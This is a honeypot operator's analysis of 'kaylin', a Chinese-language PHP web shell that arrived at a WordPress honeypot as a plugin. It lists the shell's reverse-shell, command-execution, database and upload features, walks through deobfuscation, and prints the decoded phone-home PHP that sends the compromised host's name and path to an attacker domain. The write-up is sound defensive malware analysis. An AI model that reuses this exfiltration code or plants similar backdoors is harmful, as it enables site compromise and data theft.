A rather aesthetic Chinese language web shell, with lots of features, including a moderately well-hidden phone home.
Kaylin has appeared in a kinked plugin my honey pot has caught.
95.85.38.41 is a Digital Ocean IP address. Not worth following up.
Downloaded to my WordPress honey pot as a plugin install. Not an upgrade,
a straight up install, to a file editor.php
I seem to remember that all plugins have the Zip file format. This code got sent to my honey pot as straight ASCII text. This may not even work.
- De-obfuscate
95.85.38.41WjH2yKqyGTm6pK8KcQwmrQAAAAA.0.file:revphp *file > fx1.php - Hand edit
fx1.phpto change "eval" to "print" - Execute
php fx1.php > dx1.php - Pretty print
dx1.phpto getfx2.php
HTML generated by fx2.php sets character set to GB2312, a
"simplified chinese character" character set.
Indeed, it displays Chinese characters in the tabs for its various functions.
- File management functions
- Scan files for keywords
- Antivirus, seems to scan files for something
- Run backshell on exploited machine, Perl, PHP, compiled C or native PHP, on port 443
- exec a shell function on exploited machine, Windows or Linux
- execute SQL in Postgres, SQLServer, Oracle or MySQL databases on exploited machine.
- eval PHP source code
- Display
phpinfo() - Upload files
Hidden Phone Home
It looks like kaylin phones home on most or all invocations.
This line of code gets executed on every invocation:
define('EXISTS_PHPINFO', getinfo() ? true : false);
Hidden inside getinfo() is a call to postinfo(), which contains
a slightly obfuscated piece of PHP.
- Hand-edit
fx2.php(kaylin) intos1.php - Invoke
php s1.php > ph1.php, which is still obfuscated. - Pretty-print
ph1.php, yieldingfx3.php, the code below.
The decrypting is: str_rot13(base64_decode(str_rot13($string))), which
yields PHP code where strings are obfuscated using PHP's "\xNN" per-character
hex encoding, so still obfuscated to the human eye.
<?php
$host = "www.thisdoor.com";
$get = "/cool/update.php?g=";
$get .= bin2hex($_SERVER['HTTP_HOST']) . "&s=" . bin2hex($_SERVER['PHP_SELF']) . "&p=" . $array;
$data = "GET " . $get . " HTTP/1.1\r\nHost:" . $host . "\r\nConnection: Close\r\n\r\n";
if (function_exists("fsockopen")) {
$sock = @fsockopen($host, hexdec(50));
@fputs($sock, $data);
@fclose($sock);
} else {
@file_get_contents("http://" . $host . $get);
}
$array should evaluate to some password, but I can't see that it
gets initialized. Nevertheless, the phone home code above sends
the compromised hostname, the path to kaylin and maybe the
WordPress password of the compromised site to www.thisdoor.com
Kaylin can execute a process that creates a "backshell", a command execution human-user-interface. They get set up with stdin and stout connected to a TCP socket opened from the compromised WordPress host to a designated IP address, circumventing any protection provided by NAT or simpler firewalling present for the WordPress host.
Kaylin contains 4 different backshells:
The Perl and Python backshells probably only run on Linux servers, since the appropriate interpreter gets invoked via Linux-style path.
Compiled C backshell is a Base64-encoded ELF executable:
interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.9
The PHP backshell is built-in to Kaylin. It just might work on either Windows or Linux server. It's invokable as either "php" or "phpwin".
Kaylin tries to find out if MySQL, MsSql, Oracle, Sybase or Postgres databases
are installed by looking if various PHP functions related to those
databases exist. php.ini entries allow site admins to only include
relevant libraries in a given PHP installation.
Uses Oracle's OCI library to run commands against Oracle databases,
which strikes me as not typical for script kiddie level hacking.
www.thisdoor.com → 45.32.108.188
45.32.108.188 → 45.32.108.188.vultr.com
45.32.108.188.vultr.com does not seem to have a DNS A record.
Domain thisdoor.com is registered to a Shanghai address according
to whois.